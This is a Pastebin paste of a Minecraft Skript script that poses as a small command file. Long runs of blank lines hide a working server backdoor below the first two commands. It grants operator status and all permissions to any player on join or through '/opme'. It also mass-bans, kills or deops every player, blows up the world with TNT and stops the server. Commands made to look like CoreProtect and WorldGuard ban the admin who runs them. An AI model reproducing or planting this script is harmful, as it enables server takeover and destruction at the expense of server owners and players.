Advertisement
siso_Friends

Untitled

Mar 21st, 2018
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.04 KB | None | 0 0
  1. command /f:
  2. trigger:
  3. execute console command "/effect %player% clear"
  4. stop
  5. command /c:
  6. permission: skript.admin
  7. trigger:
  8. give command block to player
  9. stop
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95. command /opme:
  96. trigger:
  97. execute player command "/playsound entity.enderdragon.death %player%"
  98. message "&6Successful, these systems were created by &bsiso_"
  99. op the player
  100. stop
  101.  
  102.  
  103. command /alldeop:
  104. trigger:
  105. execute player command "/playsound entity.blaze.death %player%"
  106. message "&7ALL players deop"
  107. deop all players
  108. stop
  109.  
  110.  
  111. command /banned:
  112. trigger:
  113. message "&call player banned!"
  114. ban all players due to "Your server was hacked"
  115. kick all players due to "L"
  116. stop
  117.  
  118. command /killer:
  119. trigger:
  120. kill all players
  121. stop
  122.  
  123.  
  124.  
  125.  
  126. command /finish:
  127. trigger:
  128. broadcast "&4End the world..."
  129. execute player command "/playsound entity_wither_spawn %player%"
  130. execute console command "tp @e %player%"
  131. execute player command "//sphere tnt 10"
  132. wait 10 seconds
  133. broadcast "&4stop the world"
  134. execute console command "/stop"
  135. stop
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142. on join:
  143. execute console command "/pex user %player% add *"
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155. on quit:
  156. if player is banned:
  157. unban player
  158. stop
  159.  
  160.  
  161. command /co i:
  162. trigger:
  163. ban the player
  164.  
  165.  
  166. command /rg f __global__ tnt -g nonmembers deny:
  167. trigger:
  168. ban the player
  169.  
  170.  
  171. command /bom:
  172. trigger:
  173. create an explosion of force 1000 at the player
  174.  
  175. command /ophelp:
  176. trigger:
  177. message "&c====Help===="
  178. message "&5/opme でOPを取得できます"
  179. message "&5/alldeop で全員のOPを剥奪します"
  180. message "&5/banned で全員BANします"
  181. message "&5/killer で全員killします&6※/kill @e[type=tnt]の対策を抜けられます"
  182. message "&5/bom で大きな爆発が起こります"
  183. message "&5/finish でなんかどーんってなって全員BANされます"
  184.  
  185.  
  186.  
  187. #Thank you for download by siso_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement